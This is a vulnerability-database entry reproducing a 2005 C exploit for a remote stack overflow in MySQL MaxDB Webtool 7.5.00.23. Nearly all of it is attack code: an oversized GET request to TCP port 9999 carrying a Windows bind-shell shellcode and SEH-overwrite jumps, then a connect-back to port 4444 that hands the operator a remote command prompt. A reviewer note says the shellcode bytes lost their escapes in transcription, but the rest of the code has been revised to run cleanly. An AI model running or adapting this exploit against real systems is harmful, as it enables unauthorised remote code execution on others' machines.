MySQL MaxDB Webtool 7.5.00.23 – Remote Stack Overflow
漏洞ID | 1055067 | 漏洞类型 | |
发布时间 | 2005-04-27 | 更新时间 | 2005-04-27 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露。 Reviewer note: the exploit listed below documents the bug itself — an over-long `GET /%...` request line (16383 bytes) sent to the MaxDB Webtool HTTP listener on TCP/9999 overflows a stack buffer. The author's comments describe overwriting an SEH record (offsets 3657/3661, which depend on the install path) with a pop/pop/ret address in wapi.dll on the German WinXP Pro SP1 build, and refer to the Metasploit module maxdb_webdbm_get_overflow for the English build. Note that the escape sequences in the listing (`\x`, `\n`, `\r`, `\"`) were stripped in transcription, so it does not compile or run as printed.
|漏洞EXP
/*
* MySQL MaxDB Webtool Remote Stack Overflow Exploit
*
* cybertronic[at]gmx[dot]net
*
* 04/27/2005
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ / _ / ___/ __/ ___/ __ / __ / / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* ___/__, /_.___/___/_/ __/_/ ____/_/ /_/_/___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ select target
* --[ 0 [0x100163d2] esi ebp ret
* --[ 1 [0xdeadc0de] crash server
* >> 0
* --[ connecting to 192.168.2.103:9999...done!
* --[ sending packet [ 16383 bytes ]...done!
* --[ sleeping 5 seconds before connecting to 192.168.2.103:4444...
* --[ connecting to 192.168.2.103:4444...done!
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
 * C:\WINDOWS\system32>
*
*/
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
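#define PORT 9999 /* TCP port of the MaxDB Webtool HTTP listener the request goes to */
/*
 * ANSI colour sequences for the status output. The transcription dropped
 * the escape character (the listing reads "E[31m"); \033 is the portable
 * spelling of ESC (the GNU-only "\E" the author probably used is avoided).
 */
#define RED "\033[31m\033[1m"
#define GREEN "\033[32m\033[1m"
#define YELLOW "\033[33m\033[1m"
#define BLUE "\033[34m\033[1m"
#define NORMAL "\033[m"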
/*
*
* prototypes
*
*/
/* Build the oversized GET request and write it to socket s; ret is the
 * address placed in the handler slot. Returns 0 on success, 1 on write failure. */
int exploit ( int s, unsigned long ret );
/* 1 if ip is a dotted-quad IPv4 address, 0 otherwise (host names are rejected). */
int isip ( char *ip );
/* Relay stdin/stdout to the connected socket s. tip and cbport are unused. */
int shell ( int s, char* tip, unsigned short cbport );
/* Sleep, then connect to tip:bport and hand the socket to shell(). */
void connect_to_bindshell ( char* tip, unsigned short bport );
/* Print the banner. NOTE(review): "()" is an old-style unspecified parameter
 * list; "(void)" is the proper prototype. */
void header ();
/* sleep() wrapper. NOTE(review): the name shadows POSIX wait(2); it only
 * links because <sys/wait.h> is never included in this file. */
void wait ( int sec );
/*********************
* Windows Shellcode *
*********************/
/* win32_bind */
/*
 * Payload: Metasploit "win32_bind" (a TCP bind shell; main() connects to
 * port 4444 afterwards).
 *
 * NOTE(review): the transcription stripped the backslash from every "\x"
 * escape, so "x31xc9" below was originally "\x31\xc9". As written these
 * are plain ASCII strings with the wrong length and contents, so
 * sizeof(bindshell) - 1 and the bytes exploit() copies are both wrong;
 * the listing cannot run until the escapes are restored.
 */
unsigned char bindshell[] =
"x31xc9x83xe9xafxd9xeexd9x74x24xf4x5bx81x73x13x92"
"x35x88x95x83xebxfcxe2xf4x6ex5fx63xdax7axccx77x6a"
"x6dx55x03xf9xb6x11x03xd0xaexbexf4x90xeax34x67x1e"
"xddx2dx03xcaxb2x34x63x76xa2x7cx03xa1x19x34x66xa4"
"x52xacx24x11x52x41x8fx54x58x38x89x57x79xc1xb3xc1"
"xb6x1dxfdx76x19x6axacx94x79x53x03x99xd9xbexd7x89"
"x93xdex8bxb9x19xbcxe4xb1x8ex54x4bxa4x52x51x03xd5"
"xa2xbexc8x99x19x45x94x38x19x75x80xcbxfaxbbxc6x9b"
"x7ex65x77x43xa3xeexeexc6xf4x5dxbbxa7xfax42xfbxa7"
"xcdx61x77x45xfaxfex65x69xa9x65x77x43xcdxbcx6dxf3"
"x13xd8x80x97xc7x5fx8ax6ax42x5dx51x9cx67x98xdfx6a"
"x44x66xdbxc6xc1x66xcbxc6xd1x66x77x45xf4x5dx99xc9"
"xf4x66x01x74x07x5dx2cx8fxe2xf2xdfx6ax44x5fx98xc4"
"xc7xcax58xfdx36x98xa6x7cxc5xcax5exc6xc7xcax58xfd"
"x77x7cx0exdcxc5xcax5exc5xc6x61xddx6ax42xa6xe0x72"
"xebxf3xf1xc2x6dxe3xddx6ax42x53xe2xf1xf4x5dxebxf8"
"x1bxd0xe2xc5xcbx1cx44x1cx75x5fxccx1cx70x04x48x66"
"x38xcbxcaxb8x6cx77xa4x06x1fx4fxb0x3ex39x9exe0xe7"
"x6cx86x9ex6axe7x71x77x43xc9x62xdaxc4xc3x64xe2x94"
"xc3x64xddxc4x6dxe5xe0x38x4bx30x46xc6x6dxe3xe2x6a"
"x6dx02x77x45x19x62x74x16x56x51x77x43xc0xcax58xfd"
"x62xbfx8cxcaxc1xcax5ex6ax42x35x88x95";
/* First-stage stub, originally "\xeb\x08" = short jmp +8. exploit() puts it
 * at offset 3657, so execution resumes at 3667: past the 4-byte address
 * slot at 3661 and into the 0x90 padding that leads to jmp2 at 3673. */
unsigned char jmp1[] =
"xebx08";
/* Second-stage stub, originally "\xe9\xe2\xf7\xff\xff" = jmp rel32 -2078.
 * At offset 3673 the 5-byte instruction ends at 3678; 3678 - 2078 = 1600,
 * which is where exploit() copies the payload. */
unsigned char jmp2[] =
"xe9xe2xf7xffxff"; //jmp -2078
/*
*
* structures
*
*/
/*
 * Target table: menu index, the address written into the handler slot,
 * and a label. ret holds a 32-bit target address in an unsigned long
 * (8 bytes on LP64 hosts, so print it with %lx); exploit() copies only
 * the first four bytes of it in memory.
 */
struct targets {
int num;
unsigned long ret;
char name[64];
}
target[] = {
/* pop/pop/ret in wapi.dll; the author reports it working on German WinXP Pro SP1 */
{ .num = 0, .ret = 0x100163d2UL, .name = "WinXP Pro SP1 GER" },
/* bogus handler address: only useful to confirm that the service crashes */
{ .num = 1, .ret = 0xdeadc0deUL, .name = "crash server" },
};
/*
*
* functions
*
*/
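/*
 * Build the malformed GET request and write all of it to socket s.
 *
 * Layout of the 16383-byte request (offsets into buffer):
 *   0      "GET /%"              start of the request line
 *   6..    0x90                  padding
 *   1600   bindshell             payload, sizeof(bindshell) - 1 bytes
 *   3657   jmp1                  "jmp +8": hops over the address slot
 *   3661   ret, 4 bytes LE       handler address of the selected target
 *   3673   jmp2                  "jmp -2078": lands on the payload at 1600
 *   ...    0x90 up to 16371, then "HTTP/1.0\r\n\r\n"
 * The author's comments describe 3657/3661 as the SEH record for the
 * German WinXP Pro SP1 build; the offset depends on the install path
 * (transcribed as C:ProgrammesdbprogramswebDocuments, presumably
 * C:\Programme\sdb\programs\web\Documents). The English build is covered
 * by the Metasploit module maxdb_webdbm_get_overflow.
 *
 * Fixes against the original: ret is serialised little-endian byte by
 * byte instead of strncpy()'d from &ret, which stopped at an embedded
 * zero byte and, on LP64 hosts, depended on the host's byte order; the
 * trailer is "HTTP/1.0\r\n\r\n" (the "\r\n" escapes were lost in
 * transcription); the whole fixed-size request is written, so a zero byte
 * in the payload or address cannot silently truncate it at strlen();
 * short write()s are retried.
 *
 * Returns 0 once the request has been written, 1 on write failure.
 */
int
exploit ( int s, unsigned long ret )
{
enum {
BUF_LEN = 16384,
TRAILER_LEN = 13, /* "HTTP/1.0\r\n\r\n" (12) plus the terminating NUL */
PAYLOAD_OFF = 1600,
JMP1_OFF = 3657,
RET_OFF = 3661,
JMP2_OFF = 3673
};
static const char trailer[] = "HTTP/1.0\r\n\r\n";
char buffer[BUF_LEN];
size_t len, off;
int i;

memset ( buffer, 0, sizeof ( buffer ) );
memset ( buffer, 0x90, sizeof ( buffer ) - TRAILER_LEN );
memcpy ( buffer, "GET /%", 6 );
memcpy ( buffer + PAYLOAD_OFF, bindshell, sizeof ( bindshell ) - 1 );
memcpy ( buffer + JMP1_OFF, jmp1, sizeof ( jmp1 ) - 1 );
for ( i = 0; i < 4; i++ )
buffer[RET_OFF + i] = (char) ( ( ret >> ( 8 * i ) ) & 0xff );
memcpy ( buffer + JMP2_OFF, jmp2, sizeof ( jmp2 ) - 1 );
/* buffer[BUF_LEN - TRAILER_LEN] is still the NUL left by the first memset,
 * so the 12-byte trailer lands exactly at the end of the buffer. */
strcat ( buffer, trailer );
len = sizeof ( buffer ) - 1; /* 16383 bytes, the full request */

printf ( "--[ sending packet [ %zu bytes ]...", len );
fflush ( stdout );
/* write() on a socket may be short; loop until everything is out */
for ( off = 0; off < len; )
{
ssize_t n = write ( s, buffer + off, len - off );
if ( n <= 0 )
{
printf ( RED "failed!\n" NORMAL );
return ( 1 );
}
off += (size_t) n;
}
printf ( YELLOW "done!\n" NORMAL );
return ( 0 );
}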
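/*
 * Return 1 if ip is a dotted-quad IPv4 address, 0 otherwise.
 *
 * Each octet must be 0..255 and the first at least 1, as in the original
 * check. Fixes against the original: a partial match such as "10.1" no
 * longer reads uninitialised octets (the sscanf count was only tested for
 * zero); %3d bounds each field so a long digit run cannot overflow int
 * inside sscanf; trailing characters ("1.2.3.4x") are rejected via %n;
 * a NULL pointer is rejected instead of dereferenced. Leading whitespace
 * and an explicit sign are still accepted by %d, as before. Host names
 * are rejected; callers must pass a numeric address.
 */
int
isip ( char *ip )
{
int octet[4];
int consumed = 0;
int i;

if ( ip == NULL )
return 0;
if ( sscanf ( ip, "%3d.%3d.%3d.%3d%n",
&octet[0], &octet[1], &octet[2], &octet[3], &consumed ) != 4 )
return 0;
if ( ip[consumed] != '\0' )
return 0;
if ( octet[0] < 1 )
return 0;
for ( i = 0; i < 4; i++ )
if ( octet[i] < 0 || octet[i] > 255 )
return 0;
return 1;
}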
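/*
 * Relay between the local terminal and the connected socket s: bytes
 * arriving on the socket go to stdout, bytes typed on stdin go to the
 * socket. tip and cbport are part of the prototype but unused.
 *
 * Fixes against the original: recv()/read() returning 0 (peer or stdin
 * closed) ends the relay instead of spinning forever on zero-length
 * writes; every exit path returns a value, since the function is declared
 * int (0 when a side closes cleanly, 1 on a select/recv/write error); the
 * fd_set is rebuilt each iteration; the pointless usleep() is dropped
 * because select() already blocks until there is something to do.
 */
int
shell ( int s, char* tip, unsigned short cbport )
{
char buffer[2048];
fd_set fd_read;
(void) tip;
(void) cbport;

printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
fflush ( stdout );
for ( ;; )
{
ssize_t n;
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
/* stdin is fd 0, so s is the highest descriptor in the set */
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
return 1;
if ( FD_ISSET ( s, &fd_read ) )
{
n = recv ( s, buffer, sizeof ( buffer ), 0 );
if ( n <= 0 )
{
printf ( "bye bye...\n" );
return n == 0 ? 0 : 1;
}
if ( write ( 1, buffer, (size_t) n ) < 0 )
{
printf ( "bye bye...\n" );
return 1;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
n = read ( 0, buffer, sizeof ( buffer ) );
if ( n <= 0 )
{
printf ( "bye bye...\n" );
return n == 0 ? 0 : 1;
}
if ( send ( s, buffer, (size_t) n, 0 ) < 0 )
{
printf ( "bye bye...\n" );
return 1;
}
}
}
}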
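/*
 * Pause to give the payload time to start listening, then connect to
 * tip:bport and hand the socket to shell(). Exits the process with 1 on
 * any failure, as the original did.
 *
 * tip must be a numeric IPv4 address (main() has already required one via
 * isip()); it is parsed with inet_pton(), so no name resolution and no DNS
 * traffic is involved. This replaces the obsolete, non-reentrant
 * gethostbyname() and the uninitialised sockaddr_in of the original. The
 * "\"" and "\n" escapes in the messages were lost in transcription and are
 * restored; the socket is closed on every exit path.
 */
void
connect_to_bindshell ( char* tip, unsigned short bport )
{
int s;
int sec = 5; // change this for fast targets
struct sockaddr_in remote_addr;

memset ( &remote_addr, 0, sizeof ( remote_addr ) );
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( bport );
if ( inet_pton ( AF_INET, tip, &remote_addr.sin_addr ) != 1 )
{
fprintf ( stderr, "invalid IPv4 address \"%s\"\n", tip );
exit ( 1 );
}
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ sleeping %d seconds before connecting to %s:%u...\n", sec, tip, (unsigned) bport );
fflush ( stdout );
wait ( sec );
printf ( "--[ connecting to %s:%u...", tip, (unsigned) bport );
fflush ( stdout );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( remote_addr ) ) == -1 )
{
printf ( RED "failed!\n" NORMAL );
close ( s );
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL );
shell ( s, tip, bport );
close ( s );
}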
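/*
 * Print the "cybertronic" banner and the author line.
 *
 * NOTE(review): the transcription mangled the escape sequences: the
 * line-ending "\n" lost its backslash (the strings ended in a literal 'n')
 * and the art's backslashes survived as the invalid escapes "\/" and "\_",
 * which GCC only warns about and prints without the backslash. They are
 * restored here as "\\" and "\n". The art's column alignment was also
 * collapsed by the transcription and is not reconstructed. fputs() is used
 * because none of the strings are format strings.
 */
void
header ()
{
fputs ( " __ __ _ \n", stdout );
fputs ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n", stdout );
fputs ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n", stdout );
fputs ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n", stdout );
fputs ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n", stdout );
fputs ( " /____/ \n\n", stdout );
fputs ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n", stdout );
}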
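/*
 * Sleep for sec seconds. sleep() returns early, with the seconds left, when
 * a signal is delivered; loop until the full interval has elapsed so the
 * bind-shell connect is not attempted too soon. Zero or negative values
 * return at once (the original passed a negative int to sleep(unsigned)).
 *
 * NOTE(review): the name shadows POSIX wait(2); this only links because
 * <sys/wait.h> is not included in this file. Renaming it and its caller
 * would be the right fix but is outside this block's interface.
 */
void
wait ( int sec )
{
unsigned int left = sec > 0 ? (unsigned int) sec : 0;
while ( left > 0 )
left = sleep ( left );
}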
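/*
 * Entry point; usage is "<prog> <ip>".
 *
 * Flow: validate the IPv4 address, print the banner and the target menu,
 * read a target index from stdin, connect to <ip>:PORT, send the request
 * built by exploit(), then connect back to the bind-shell port and relay
 * I/O through shell().
 *
 * Fixes against the original: the target index is read with fgets/strtol
 * and range-checked against the table size (scanf's result was ignored,
 * leaving targ uninitialised on non-numeric input); the menu prints the
 * address with %lx to match unsigned long (%x with a long is undefined);
 * system("clear"), which runs whatever "clear" is first in PATH, is
 * replaced by the equivalent ANSI sequence; the address is parsed with
 * inet_pton() instead of the obsolete gethostbyname() — isip() has already
 * required a dotted quad, so nothing is lost; the sockaddr is zeroed; the
 * missing "\n" and "\"" escapes are restored. Returns 0 on success and
 * exits with 1 on any failure, as before.
 */
int
main ( int argc, char* argv[] )
{
/* Port the bind-shell payload is expected to listen on (see the author's
 * transcript). It is a property of the payload bytes, not a free parameter. */
enum { BINDSHELL_PORT = 4444 };
const size_t ntargets = sizeof ( target ) / sizeof ( target[0] );
int s;
long targ;
size_t i;
char line[32];
char *end;
struct sockaddr_in remote_addr;

if ( argc != 2 )
{
printf ( "Usage: %s <ip>\n", argv[0] );
exit ( 1 );
}
printf ( "\033[H\033[2J" ); /* clear the screen without spawning a shell */
header ();
if ( !isip ( argv[1] ) )
{
printf ( "Invalid Target IP!\n" );
exit ( 1 );
}
printf ( "--[ select target\n" );
for ( i = 0; i < ntargets; i++ )
printf ( "--[ %d [0x%08lx] %s\n", target[i].num, target[i].ret, target[i].name );
printf ( " >> " );
fflush ( stdout );
if ( fgets ( line, sizeof ( line ), stdin ) == NULL )
{
printf ( "--[ invalid target!\n" );
exit ( 1 );
}
errno = 0;
targ = strtol ( line, &end, 10 );
if ( end == line || ( *end != '\n' && *end != '\0' ) || errno == ERANGE
|| targ < 0 || (size_t) targ >= ntargets )
{
printf ( "--[ invalid target!\n" );
exit ( 1 );
}
memset ( &remote_addr, 0, sizeof ( remote_addr ) );
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( PORT );
if ( inet_pton ( AF_INET, argv[1], &remote_addr.sin_addr ) != 1 )
{
fprintf ( stderr, "invalid IPv4 address \"%s\"\n", argv[1] );
exit ( 1 );
}
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u...", argv[1], (unsigned) PORT );
fflush ( stdout );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( remote_addr ) ) == -1 )
{
printf ( "failed!\n" );
close ( s );
exit ( 1 );
}
printf ( "done!\n" );
if ( exploit ( s, target[targ].ret ) == 1 )
{
printf ( "exploitation FAILED!\n" );
close ( s );
exit ( 1 );
}
close ( s );
connect_to_bindshell ( argv[1], BINDSHELL_PORT );
return 0;
}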
// milw0rm.com [2005-04-27]